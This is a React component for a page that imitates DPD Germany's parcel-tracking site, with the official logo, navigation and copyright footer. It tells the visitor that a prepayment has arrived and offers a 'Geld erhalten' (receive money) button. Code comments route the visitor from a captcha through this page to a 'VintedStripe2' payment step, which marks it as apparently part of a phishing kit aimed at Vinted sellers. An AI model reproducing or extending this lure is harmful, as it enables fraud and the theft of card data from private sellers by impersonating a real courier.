import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DpdDeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const STEPPER_IMG = `${P}/dpd-de-stepper.png`;
/** Offizielles DPD-Logo (2015), Wikimedia Commons / dpd.com — gleiche Datei wie CZ */
const DPD_LOGO_SRC = `${P}/dpd-cz/dpd-logo-official.svg`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function IconBell() {
  return (
    <svg className="dpdde-header-ico-svg" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M12 22c1.1 0 2-.9 2-2h-4c0 1.1.89 2 2 2zm6-6v-5c0-3.07-1.64-5.64-4.5-6.32V4c0-.83-.67-1.5-1.5-1.5s-1.5.67-1.5 1.5v.68C7.63 5.36 6 7.92 6 11v5l-2 2v1h16v-1l-2-2z"
      />
    </svg>
  );
}

function IconUser() {
  return (
    <svg className="dpdde-header-ico-svg" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z"
      />
    </svg>
  );
}

function IconSearch() {
  return (
    <svg className="dpdde-search-svg" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M15.5 14h-.79l-.28-.27A6.471 6.471 0 0016 9.5 6.5 6.5 0 109.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 4 11.01 4 8s3.01-6 6.5-6S17 5.01 17 8s-3.01 6-6.5 6z"
      />
    </svg>
  );
}

function MoneyReceiveIcon() {
  return (
    <svg className="dpdde-money-ico" viewBox="0 0 24 24" aria-hidden>
      <rect x="2.5" y="7" width="19" height="10" rx="1.2" fill="none" stroke="currentColor" strokeWidth="1.4" />
      <circle cx="12" cy="12" r="3.2" fill="none" stroke="currentColor" strokeWidth="1.2" />
      <path d="M12 10.2v3.6M10.2 12h3.6" stroke="currentColor" strokeWidth="1.3" strokeLinecap="round" />
    </svg>
  );
}

/**
 * DPD Deutschland — Erfolgsseite wie DPD EE, Texte auf Deutsch; Captcha → diese Seite → index2 (VintedStripe2).
 */
function DpdDeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'DE').toUpperCase();
  const sym = getSymbol(getPrimaryCurrency(countryCode) || 'EUR');

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountWithCurrency = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;
  const address = (pageData?.delivery_address || '').trim() || '—';
  const trackingCode =
    (pageData?.tracking_number && String(pageData.tracking_number).trim()) ||
    (pageData?.unique_id && String(pageData.unique_id).trim()) ||
    pageData?.page_code ||
    pageCode ||
    '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const productName = (pageData?.product_name || '').trim() || '—';
  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPhoto = Boolean(photoSrc && !imgFailed);
  const showProductBar = showPhoto || productName !== '—';

  if (loading && pageCode) {
    return (
      <div className="dpdde-wrap" lang="de">
        <header className="dpdde-header">
          <div className="dpdde-header-inner">
            <div className="dpdde-logo" aria-label="DPD">
              <img src={DPD_LOGO_SRC} alt="DPD" className="dpdde-header-logo-img" decoding="async" />
            </div>
          </div>
        </header>
        <main className="dpdde-main">
          <div className="dpdde-loading">Wird geladen…</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="dpdde-wrap" lang="de">
      <header className="dpdde-header">
        <div className="dpdde-header-inner">
          <a href="#/" className="dpdde-logo" aria-label="DPD Startseite">
            <img src={DPD_LOGO_SRC} alt="DPD" className="dpdde-header-logo-img" decoding="async" />
          </a>
          <nav className="dpdde-nav">
            <a href="#/" className="dpdde-nav-link">
              Anmelden/Registrieren
            </a>
            <a href="#/" className="dpdde-nav-link">
              Paket versenden
            </a>
            <a href="#/" className="dpdde-nav-link dpdde-nav-link--active">
              Meine Pakete
            </a>
            <a href="#/" className="dpdde-nav-link">
              Paketshop finden
            </a>
            <a href="#/" className="dpdde-nav-link">
              Hilfe/FAQ
            </a>
          </nav>
          <div className="dpdde-header-icons">
            <button type="button" className="dpdde-icon-btn" aria-label="Benachrichtigungen">
              <IconBell />
            </button>
            <button type="button" className="dpdde-icon-btn" aria-label="Benutzerkonto">
              <IconUser />
            </button>
          </div>
        </div>
      </header>

      <main className="dpdde-main">
        <section className="dpdde-tracking">
          <div className="dpdde-tracking-left">
            <div className="dpdde-tabs">
              <button type="button" className="dpdde-tab dpdde-tab--active">
                Versendungen
              </button>
              <button type="button" className="dpdde-tab">
                Rücksendungen
              </button>
            </div>
            <div className="dpdde-search">
              <input type="text" className="dpdde-search-input" placeholder="Paketnummer" readOnly />
              <span className="dpdde-search-icon-wrap" aria-hidden>
                <IconSearch />
              </span>
            </div>
            <div className="dpdde-search-list">
              <div className="dpdde-search-item-code">{trackingCode}</div>
              <div className="dpdde-search-item-status">Vorauszahlung eingegangen</div>
              <div className="dpdde-search-steps" aria-hidden>
                <span className="dpdde-step dpdde-step--active" />
                <span className="dpdde-step" />
                <span className="dpdde-step" />
                <span className="dpdde-step" />
                <span className="dpdde-step" />
              </div>
            </div>
          </div>

          <div className="dpdde-tracking-main">
            <div className="dpdde-tracking-header">
              <h2 className="dpdde-tracking-title">Sendung: {trackingCode}</h2>
              <div className="dpdde-stepper-wrap">
                <img src={STEPPER_IMG} alt="" className="dpdde-stepper-img" decoding="async" />
              </div>
            </div>

            {showProductBar && (
              <div className="dpdde-product-bar">
                {showPhoto ? (
                  <img
                    className="dpdde-product-img"
                    src={photoSrc}
                    alt=""
                    onError={() => setImgFailed(true)}
                    decoding="async"
                  />
                ) : (
                  <div className="dpdde-product-ph" aria-hidden />
                )}
                <div className="dpdde-product-meta">
                  <span className="dpdde-product-label">Artikel</span>
                  <span className="dpdde-product-name">{productName}</span>
                </div>
              </div>
            )}

            <div className="dpdde-detail-card">
              <div className="dpdde-detail-split">
                <div className="dpdde-detail-amounts" aria-label="Betrag">
                  <div className="dpdde-detail-amount-line dpdde-detail-amount-line--top">{amountWithCurrency}</div>
                  <div className="dpdde-detail-amount-line dpdde-detail-amount-line--bottom">{priceText}</div>
                </div>
                <div className="dpdde-detail-status">
                  <div className="dpdde-status-row">
                    <span className="dpdde-status-dot" aria-hidden />
                    <span>Vorauszahlung eingegangen, warte auf Bestätigung des Verkäufers</span>
                  </div>
                  <div className="dpdde-status-address">{address}</div>
                </div>
              </div>
              <Link to={index2Path} className="dpdde-money-btn">
                <MoneyReceiveIcon />
                Geld erhalten
              </Link>
            </div>
          </div>
        </section>

        <footer className="dpdde-page-footer">
          <div className="dpdde-page-footer-top">
            <div className="dpdde-footer-brand">
              <span className="dpdde-footer-network">NETWORK MEMBER OF</span>
              <span className="dpdde-footer-geopost">GEOPOST</span>
            </div>
            <div className="dpdde-footer-version">Portal-Version: 3.122.0</div>
            <div className="dpdde-footer-copy-right">© 2025 DPDgroup</div>
          </div>
          <div className="dpdde-page-footer-links">
            <a href="#/">AGB</a>
            <span className="dpdde-footer-dot">·</span>
            <a href="#/">Datenschutz</a>
            <span className="dpdde-footer-dot">·</span>
            <a href="#/">Hilfe/FAQ</a>
          </div>
        </footer>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DpdDeSuccess;
